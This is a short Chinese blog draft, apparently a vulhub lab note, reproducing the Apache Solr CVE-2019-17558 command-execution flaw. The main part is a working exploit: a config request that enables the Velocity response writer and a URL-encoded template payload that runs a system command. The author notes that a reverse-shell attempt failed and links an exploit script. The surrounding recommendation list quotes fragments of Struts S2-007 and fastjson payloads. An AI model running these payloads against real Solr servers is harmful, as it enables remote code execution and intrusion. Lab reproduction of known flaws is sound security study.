草稿solr

于 2021-09-17 14:04:55 发布
阅读量104 收藏
点赞数
分类专栏: vulhub 文章标签: solr
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/120325283
版权

CVE-2019-17558 命令执行漏洞

参考文章里的包有问题!这里提供对的包!

POST /solr/demo/config HTTP/1.1
Host: solr:8983
Content-Type: application/json
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

在这里插入图片描述

这里是get请求,所以用url编码!

http://your-ip:8983/solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

但是反弹失败了

但是反弹失败了

https://smling.blog.csdn.net/article/details/115705233
https://my.oschina.net/u/4196756/blog/5011317
Apache Solr 漏洞总结
在这里插入图片描述
https://github.com/zhzyker/exphub/blob/master/solr/cve-2019-17558_cmd.py

樱浅沐冰
关注
专栏目录
Solr7.4.0应用部署Demo,比较全面完整,亲测有效
h0713的博客
09-07 3969
本文参考: http://www.cnblogs.com/tony-zt/p/9260017.html http://www.importnew.com/12707.html https://blog.csdn.net/wzy18210825916/article/details/80946454 https://blog.csdn.net/column/details/17959.htm...
太阳能项目
02-16
草稿 索尔州 本文档是对功能,改进和错误修复的注释,这些注释归类为重点领域。 通常,当我们阅读CHANGES条目时,对于偶然的观察者来说,关于Jira的动机尚不清楚。 本文档旨在按重点领域对Jiras进行分组,并简要...
Solr操作Demo
风行天下
08-08 192
package com.feng.solr; import java.io.IOException; import java.net.MalformedURLException; import org.apache.solr.client.solrj.SolrServerException; import org.apache.solr.client.solrj.impl.Htt...
Solr学习总结
hopdog的博客
05-22 518
Solr1、solr是什么呢?一、Solr它是一种开放源码的、基于Lucene Java 的搜索服务器,易于加入到 Web 应用程序中。 二、Solr提供了层面搜索(就是统计)、命中醒目显示并且支持多种输出格式(包括XML/XSLT 和JSON等格式)。它易于安装和配置,而且附带了一个基于 HTTP 的管理界面。Solr已经在众多大型的网站中使用,较为成熟和稳定。 三、Solr包装并扩展了 Luc...
Solr详细安装配置及测试demo等资源
qq_27794563的博客
06-20 439
完整的资源 实在没时间一个个将笔记弄上来 将笔记转成文档 很详尽 如果需要相关资源请下载:目前资源正在审核后期更新链接 成品资源截图: 这是我配置好的tomcatSolr 用的时候换下web.xml中的solrhome路径即可 当然域名关系着你的业务 肯定也要根据自己需求更改 其他无需变动 (导入数据的话如果有需要 资源中也提供了sql语句插入 mysql密码等需要自己换 可以自己测)如何换文档中都有 如需要自己动手来一遍 也提供了所有资源: solr文件夹是springboot整合s
自动提示功能实现:solr中TermsComponent源代码分析
每天=生命的最后一天
12-01 4457
一个曾实现的简单思路:<br />自动提示功能,以前的有一种实现思路就是在数据库里建一张表,其主要字段有:<br />     keyword-检索关键字;kcount-检索次数;dissect_word-对检索关键字分词后的结果;kdate:检索时间<br />    由于用户输入的检索关键字可能很乱,又可能很杂,所以想到通过分词器把检索关键字进行分词处理,若数据库中在dissect_word中找到含有相同的值则认为是检索相同的关键字,kcount+1.<br />    当用户检索“lucene”的时候
solr8学习进阶(二)整合springboot实现空间资源搜索
谢小鱼的博客
11-08 865
本文基于2019.10.25的solr最新版本solr-8.2.0 目标 实现对mysql数据库中的资源数据的圆选、框选。圆选及在地图上画圆,将圆心坐标以及半径作为参数传给后端,后端返回坐标处于圆内的资源数据,用于前端将资源标绘。框选即在地图上选择多个点组成多边形,将每个角的坐标传给后端,后端返回坐标在多边形(框)内的资源数据,用于前端将资源进行标绘。 solr导入MySql数据 上一篇已经讲...
solr服务器搭建与mysql数据导入
zuofei01的博客
08-29 590
solr服务器搭建与使用主要人分为两部分,solr服务器的搭建与如何在java web项目中使用solr。-solr服务器的搭建-数据库数据的导入 创建core solr目录下执行./bin/solr create -c xinshen_sskt_coursexinshen_sskt_course为我需要的core的名称,之后可以在 /solr-6.6.0/server/solr 下看到该目录
solr 集成web项目后 执行查询时报错Error from server at http://localhost:8080/solr/collection1
qq_34990682的博客
07-26 9422
solr 集成web项目后 执行查询时报错Error from server at http://localhost:8080/solr/collection1 本Markdown编辑器使用StackEdit修改而来,用它写博客,将会带来全新的体验哦: 报的异常我粘贴到下面了 七月 26, 2018 1:02:56 下午 org.apache.catalina.core.Standard...
solr使用 备忘录 草稿
xinghaifeng2006的专栏
06-04 108
一、基础配置 官网下载: http://lucene.apache.org/solr/ 我下载下载版本是apache-solr-3.6.2   第一步:复制apache-solr-3.6.2\example\solr 文件夹到Tomcat7的根目录 第二步:复制apache-solr-3.6.2\example\webapps\solr.war 到Tomcat7的webapps目录下...
PDF-Drupal6ContentAdministration-英文版.rar
10-09
8. **搜索和索引(Search and Indexing)**: 内置的搜索功能可以搜索网站内容,同时支持与其他搜索解决方案集成,如Apache Solr,提供更高级的搜索体验。 9. **模块化(Modularity)**: Drupal的核心特性之一是其...
Lucene in action 2nd Edition MEAP(英文版第二版)
07-23
MEAP(Manning Early Access Program)是一种出版模式,允许读者在书完全出版之前获取章节的早期草稿,以便尽早了解和学习新知识。 Lucene是一个高性能、全功能的文本搜索库,它为Java开发者提供了强大的搜索功能,...
Drupal教程
04-28
3. 工作流与状态:Drupal提供了工作流管理,可以定义内容的发布状态,如草稿、审核、发布等。 四、模块化开发 1. 模块安装:Drupal的核心功能可以通过安装第三方模块来扩展,从官方模块库或第三方源下载后,将模块...
【vulhub】s2-007远程代码执行漏洞
热门推荐
qq_45300786的博客
07-08 2万+
poc %27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.l
Jboss账号密码、jboss网站跟目录、Jboss弱口令
qq_45300786的博客
04-14 3749
我们在JBoss安 装目录/server/default/config下找到它,并进行JBoss配置。查找名字为:jmx-console的application- policy: <application-policy name = "jmx-console"> <authentication> <login-module code="org.jboss.security.auth.spi.UsersRolesLoginModule" flag = "required"&
【vulhub】fastjson反序列化漏洞验证POC
qq_45300786的博客
07-10 3580
盲打payload: 1.2.67版本前 {"zeo":{"@type":"java.net.Inet4Address","val":"fatu5k.dnslog.cn"}} 1.2.67版本后payload {"@type":"java.net.Inet4Address","val":"dnslog"} {"@type":"java.net.Inet6Address","val":"dnslog"} 这里我是fastjson1.2.24版本 先获取一个dnslog 抓包,然后加上我们的payloa
【vulhub】Tomcat任意文件上传漏洞(CVE-2017-12615)复现
qq_45300786的博客
04-16 3527
漏洞介绍 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,其中 远程代码执行漏洞(CVE-2017-12615) 影响: Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全) 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求
【vulhub】Weblogic后台部署War包Getshell
qq_45300786的博客
04-13 2956
一、什么是WebLogic WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 二、漏洞描述 本环境模拟了一个真实的weblogic环境,其后台存在一个弱口令,并且前台存在任意文件读取漏洞。分别通过这两种漏洞,模拟
【vulhub】Weblogic(CVE-2018-2628)漏洞复现
qq_45300786的博客
04-10 2620
一、什么是WebLogic WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 先提几个概念 JRMP:java remote method protocol,Java远程方法协议 JRMP是的Java技术协议的具
详述Solr服务器搭建步骤
"本资源提供了一份关于Solr服务器搭建的详细步骤,涵盖了从创建Solr目录、安装分词器到配置Tomcat,直至成功启动和验证Solr服务的全过程。" 在IT领域,Apache Solr是一款流行的开源全文搜索引擎,常用于大数据量、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值